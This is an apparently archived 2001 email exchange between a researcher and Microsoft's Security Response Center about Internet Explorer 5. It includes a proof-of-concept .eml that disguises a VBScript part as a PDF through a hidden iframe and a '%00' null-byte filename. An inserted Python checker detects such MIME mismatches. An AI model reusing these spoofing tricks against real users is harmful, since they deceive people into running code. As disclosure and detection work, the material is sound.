Hi Jesus -

I'm afraid the situation may not be what you believe. First, your system is not patched, despite what the dialogue says. The dialogue is displayed if you try to install the patch on anything other than IE 5.01 Service Pack 1 or IE 5.5 Service Pack 1, and the text of the dialogue is incorrect. This error has been present in several recent IE patches, and we're working to ensure that it's not present in future ones. Meantime, here's the passage from the bulletin that discusses it:

-------- start ----------
Caveats: If the patch is installed on a system running a version of IE other than the one it is designed for, an error message will be displayed saying that the patch is not needed. This message is incorrect, and customers who see this message should upgrade to a supported version of IE and re-install the patches.
-------- end ----------

We checked the code you provided below, and have verified that the behavior you're seeing is not a vulnerability. Although you're right that it's possible for a web site to initiate a file download, this is by-design behavior and is unrelated to the vulnerability discussed in MS01-020. A Q&A in the FAQ discusses the situation:

-------- start ----------
I heard that even after applying this patch, an e-mail could start a file download automatically. Is this true?

Yes. However, this is not related to this vulnerability, and doesn't pose a security risk. It's always possible for an e-mail to start a file download, and of course the author of the mail can give the file a name that sounds innocuous. However, the file download cannot actually begin unless and until the user selects a location to which it should be downloaded, and clicks the OK button. As a general rule, it is probably worth questioning the trustworthiness of any e-mail that automatically starts a file download. The best action is to simply click the Cancel button in the dialogue.
-------- end ----------

Hope that helps explain the situation.

Regards,

Scott Culp
Security Program Manager
Microsoft Security Response Center

-----Original Message-----
From: Jesús López de Aguileta [mailto:[EMAIL PROTECTED]]
Sent: Monday, April 02, 2001 1:12 PM
To: [EMAIL PROTECTED]
Subject: User may be fooled to execute programs browsing with IE5.1

Hi,

Playing with Cuartango's recent exploit (http://www.kriptopolis.com/cua/eml.html) I've found that it's possible to trick a user into executing a file by making him/her think it's a data file of some kind (pdf, mpeg, ...). This works on both NT and 2000 using IE 5.1 (other platforms/IE versions not tested). I have already downloaded the MS01-020 patch on the systems tested, but both appear not to be vulnerable to Cuartango's exploit (msgbox: "This update does not need to be installed on your system"), probably because both have an updated Media Player 7 installed. I think this is a completely different issue; excuse me if it has previously been solved/commented on.
Detail:

--------8<----cut here-------8<
From: "Ripped from Juan Carlos Garcia Cuartango"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal

--1
Content-Type: multipart/alternative; boundary="2"

--2
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff >
<iframe src=3Dcid:donthurtme.pdf height=3D0 width=3D0></iframe>
Done<br>
</BODY>
</HTML>

--2--

--1
Content-Type: application/x-shockwave-flash; name="hola.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: <donthurtme.pdf>

msgbox("Hello")

--1--
--------8<--cut here---------8<

Making an .eml file with the above content and browsing it with IE 5 displays a window offering to download or open online the "FILE" (not program) "donthurtme.pdf". If the user chooses to open it online, the VBScript code executes.

Another interesting issue is that, when replacing MIME part 1 with:

--1
Content-Type: application/xxxx; name="hola.pdf%00.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: <donthurtme.pdf>

msgbox("Hello")

--1--

IE truncates the name in the popup window, displaying "hola.pdf" instead of "hola.pdf%00.vbs", making the user think that the extension of the program is different. Notice that in this second case IE properly asks "Run this PROGRAM" or "Save this PROGRAM"; only the extension may confuse the user.

Regards and excuse my poor English.
Jesus Lopez de Aguileta
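The disagreement Jesús describes between the name IE shows, the part's declared type and its Content-ID is mechanically detectable on the mail-gateway side. The checker below is an added example, not code from either message: it walks the MIME structure of a message and reports parts whose displayed filename (after %00 decoding), declared Content-Type and Content-ID point at different file kinds. The sample message is constructed after the second variant above, flattened to one multipart level; the filename, content types and Content-ID are the posted ones, and the body is the same harmless msgbox.

```python
from email import message_from_string, policy
from urllib.parse import unquote

# Constructed sample after the second .eml variant in the thread (flat
# multipart for brevity; the body is a harmless msgbox, the headers are
# what the checks inspect).
SAMPLE_EML = """\
MIME-Version: 1.0
Content-Type: multipart/related; boundary="1"

--1
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><BODY><iframe src=3Dcid:donthurtme.pdf height=3D0 width=3D0></iframe></BODY></HTML>
--1
Content-Type: application/x-shockwave-flash; name="hola.pdf%00.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: <donthurtme.pdf>

msgbox("Hello")
--1--
"""

# Extensions Windows hands to a script host or loader; none should arrive
# labelled as a document or media type.
SCRIPT_EXTS = {"vbs", "vbe", "js", "jse", "wsf", "hta", "exe", "scr", "bat", "cmd"}

def _ext(name):
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""

def audit_parts(raw):
    """Return (filename, reason) findings for parts whose name, type and Content-ID disagree."""
    msg = message_from_string(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        name = part.get_filename()           # falls back to Content-Type's name=
        if part.is_multipart() or not name:
            continue
        real = unquote(name)                 # %00 decodes to NUL
        shown = real.split("\x00", 1)[0]     # what a C-string display layer prints
        if shown != real:
            findings.append((name, "NUL truncates displayed name to %r" % shown))
        if _ext(real) in SCRIPT_EXTS:
            findings.append((name, "script extension under %s" % part.get_content_type()))
        cid = str(part.get("Content-ID", "")).strip("<>")
        if cid and _ext(cid) != _ext(real):
            findings.append((name, "Content-ID %s implies a different type" % cid))
    return findings
```

Against the sample, all three checks fire on the single attachment; a plain `application/pdf` part named and referenced as `.pdf` produces no findings.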
Re: User may be fooled to execute programs browsing with IE5.1
Microsoft Security Response Center Tue, 03 Apr 2001 12:47:12 -0700